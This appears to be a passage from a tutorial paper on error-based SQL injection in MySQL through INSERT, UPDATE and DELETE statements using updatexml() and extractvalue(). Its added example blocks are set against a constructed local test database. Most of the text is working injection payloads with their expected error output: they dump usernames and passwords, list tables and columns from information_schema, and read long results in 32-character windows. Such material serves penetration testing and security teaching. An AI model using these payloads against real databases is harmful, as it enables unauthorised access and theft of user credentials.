Let’s dump the first entry in the 'users' table using INSERT and DELETE.
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or
updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users
limit 0,1)),0) or '', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~1:Olivia:Nervo'
DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id,
username, password) FROM users limit 0,1)),0) or '';
ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'
Using updatexml() you can retrieve table names, column names and row data through INSERT, UPDATE and DELETE statements alike. The one restriction is the UPDATE statement: you cannot dump data from the table that the UPDATE itself is modifying. For example, with the injection point in the users table, the following query
UPDATE users SET password='Nicky' or updatexml(1,concat(0x7e,(SELECT
concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE
id=2 and username='Olivia';
returns no data, because the subquery in the SET clause reads from the very table the statement is updating, and MySQL does not allow that; the statement is rejected and the XPATH error that would carry the data never appears. In this situation the table you dump from has to be different from the one you are injecting into. For the sake of this paper, create a second table named 'students' with the columns id, name and address, and insert some values.
Now, with the injection point in the 'students' table, we can dump data from the 'users' table (or any table other than the one being updated). This restriction applies to the UPDATE statement only; the INSERT and DELETE statements above read from the same table without trouble.
UPDATE students SET name='Nicky' or Updatexml(1,concat(0x7e,(SELECT
concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE
id=1;
ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'
If you are stuck with an UPDATE injection that can only reach the same table, you can fall back to double query injection instead; it is discussed under the next few headings.
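The three cases above side by side, as an added example that is not part of the original paper. The schema is constructed here to match the tables the paper refers to (newdb.users holding Jane/Eyre, plus a students table); the expected server responses are given in the comments, and the 'x' and 'nowhere' values are placeholders.

```sql
-- Added example (not from the original paper). Assumes a scratch database
-- 'newdb' on a local MySQL server; every table, row and value below is
-- constructed for this demonstration.
CREATE DATABASE IF NOT EXISTS newdb;
USE newdb;

CREATE TABLE users (
  id       INT PRIMARY KEY,
  username VARCHAR(32),
  password VARCHAR(32)
);
INSERT INTO users VALUES (1, 'Jane', 'Eyre');

CREATE TABLE students (
  id      INT PRIMARY KEY,
  name    VARCHAR(32),
  address VARCHAR(64)
);
INSERT INTO students VALUES (1, 'Nicky', 'nowhere');

-- 1. DELETE: the subquery in WHERE may read from the table being deleted
--    from. The XPATH error fires first, so the row is NOT deleted.
--    Expected: ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'
DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,
  (SELECT concat_ws(':',id,username,password) FROM users limit 0,1)),0) or '';

-- 2. UPDATE on the same table: a subquery in SET that reads from the table
--    being updated is refused, so the XPATH error (and the data) never shows.
--    Expected: ERROR 1093 (HY000): You can't specify target table 'users'
--    for update in FROM clause
UPDATE users SET password='x' or updatexml(1,concat(0x7e,
  (SELECT concat_ws(':',id,username,password) FROM newdb.users limit 0,1)),0) or ''
  WHERE id=1;

-- 3. UPDATE on a different table: the identical payload now works, because
--    the subquery reads newdb.users while students is the table being updated.
--    Expected: ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'
UPDATE students SET name='Nicky' or updatexml(1,concat(0x7e,
  (SELECT concat_ws(':',id,username,password) FROM newdb.users limit 0,1)),0) or ''
  WHERE id=1;

-- 4. Walking a table row by row: learn the row count first, then step the
--    LIMIT offset (limit 0,1 -> limit 1,1 -> ...) in the payload of case 3.
--    Expected: ERROR 1105 (HY000): XPATH syntax error: '~1'
UPDATE students SET name='Nicky' or updatexml(1,concat(0x7e,
  (SELECT count(*) FROM newdb.users)),0) or '' WHERE id=1;
```

Because every payload terminates the statement with an error, none of the INSERT, UPDATE or DELETE statements actually changes the table; the same test rows can be reused for each probe.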
Injection Using extractvalue()
extractvalue() raises the same XPATH syntax error, so it can be used for these injections as well. The payload built on it looks like this:
or extractvalue(1,concat(0x7e,database())) or
Insert
We can apply it in the INSERT statement like this:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or
extractvalue(1,concat(0x7e,database())) or'', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~newdb'
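Going beyond database(), the same extractvalue() position can pull table and column names from information_schema, and then the data itself. This is an added example, not the paper's own; it assumes the newdb.users (id, username, password) table the paper uses, and the id value 3 is an arbitrary choice (the row is never inserted because the statement errors out). It also shows the caveat a practitioner runs into first: MySQL truncates the text quoted in the XPATH syntax error to 32 characters, so longer results have to be read through mid() in windows.

```sql
-- Added example (not from the original paper). Assumes the 'newdb' database
-- and its 'users' table (id, username, password); the expected errors in
-- the comments assume the tables 'students' and 'users' exist in newdb.
USE newdb;

-- 1. Table names in the current database, one error message for all of them.
--    Expected: ERROR 1105 (HY000): XPATH syntax error: '~students,users'
INSERT INTO users (id, username, password) VALUES (3,'Olivia' or
  extractvalue(1,concat(0x7e,(SELECT group_concat(table_name ORDER BY table_name)
    FROM information_schema.tables WHERE table_schema=database()))) or '', 'Nervo');

-- 2. Column names of one table.
--    Expected: ERROR 1105 (HY000): XPATH syntax error: '~id,username,password'
INSERT INTO users (id, username, password) VALUES (3,'Olivia' or
  extractvalue(1,concat(0x7e,(SELECT group_concat(column_name ORDER BY ordinal_position)
    FROM information_schema.columns
    WHERE table_schema=database() AND table_name='users'))) or '', 'Nervo');

-- 3. The quoted text is cut at 32 characters, and the leading '~' (0x7e)
--    that forces the syntax error takes one of them. Read the result in
--    31-character windows with mid(str, pos, len): positions 1, 32, 63, ...
--    Window 1 (characters 1-31 of the joined rows):
INSERT INTO users (id, username, password) VALUES (3,'Olivia' or
  extractvalue(1,concat(0x7e,mid((SELECT group_concat(concat_ws(':',id,username,password))
    FROM users),1,31))) or '', 'Nervo');
--    Window 2 (characters 32-62); an error showing only '~' means the
--    previous window already held the end of the string:
INSERT INTO users (id, username, password) VALUES (3,'Olivia' or
  extractvalue(1,concat(0x7e,mid((SELECT group_concat(concat_ws(':',id,username,password))
    FROM users),32,31))) or '', 'Nervo');
```

The '~' marker is what guarantees the error: it is not valid at the start of an XPath expression, so the parser fails at position 0 and quotes everything from that point on, which is exactly the injected data. Without it, a result that happens to be a legal XPath name (a bare table name, for instance) would be evaluated silently and nothing would be returned.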